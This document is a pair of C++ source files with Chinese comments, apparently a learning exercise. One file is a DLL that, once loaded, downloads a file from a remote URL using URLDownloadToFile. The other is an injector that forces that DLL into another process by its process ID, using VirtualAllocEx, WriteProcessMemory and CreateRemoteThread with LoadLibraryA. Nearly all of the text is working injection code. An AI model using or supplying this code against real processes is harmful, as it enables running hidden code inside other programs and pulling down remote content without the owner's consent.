// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"
#include "windows.h"
#include "tchar.h"
#include "Urlmon.h"
#pragma comment(lib, "urlmon.lib")
#define DEF_URL "http://biancheng.dnbcw.info/c/158628.html"
#define DEF_FILE_NAME "index.html"
HMODULE g_hMod= NULL;
DWORD WINAPI ThreadProc(LPVOID lParam)
{
char szPath[MAX_PATH] = {0};
if (!GetModuleFileName(g_hMod, szPath, MAX_PATH))
{
return FALSE;
}
OutputDebugString(szPath);
char *p = strrchr(szPath, '\\');
if (!p)
{
return FALSE;
}
strcpy_s(p+1, MAX_PATH, DEF_FILE_NAME);
OutputDebugString(szPath);
URLDownloadToFile(NULL, DEF_URL, szPath, 0, NULL);
return 0;
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
HANDLE hThread = NULL;
g_hMod = hModule;
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
OutputDebugString("注入成功,开始下载Url!");
hThread = CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);
CloseHandle(hThread);
}
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
// remotethread.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include "windows.h"
#include "tchar.h"
BOOL InjrctDll(DWORD dwPid, LPCTSTR szDllPath)
{
HANDLE hProcess = NULL, hThread = NULL;
HMODULE hMod = NULL;
LPVOID pRemoteBuf = NULL;
DWORD dwBufSize = strlen(szDllPath) +1;
LPTHREAD_START_ROUTINE pThreadProc;
//#1 使用进程ID获取进程句柄
if (!(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid)))
{
printf("open process %d failed!!! [%d]\n", dwPid, GetLastError());
return FALSE;
}
//#2 在目标进程分配dll大小的内存
pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize, MEM_COMMIT, PAGE_READWRITE);
if (!pRemoteBuf)
{
printf("pRemoteBuf\n");
return FALSE;
}
//#3 将dll路径写入分配的内存
if (!WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)szDllPath, dwBufSize, NULL))
{
printf("WriteProcessMemory\n");
return FALSE;
}
//#4 获取loadlibrary API的地址
hMod = GetModuleHandle("kernel32.dll");
if (!hMod)
{
printf("hMod\n");
return FALSE;
}
pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(hMod, "LoadLibraryA");
if (!pThreadProc)
{
printf("pThreadProc\n");
return 0;
}
hThread = CreateRemoteThread(hProcess, NULL, 0, pThreadProc, pRemoteBuf, 0, NULL);
if(!hThread)
{
printf("hThread\n");
return 0;
}
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
CloseHandle(hProcess);
return TRUE;
}
int _tmain(int argc, _TCHAR* argv[])
{
if (InjrctDll(42448, "E:\\qt_test\\creatremotethread\\remotethread\\Debug\\dll.dll"))
{
printf("succeed!!!\n");
}
else
{
printf("error!!!\n");
}
while(1);
return 0;
}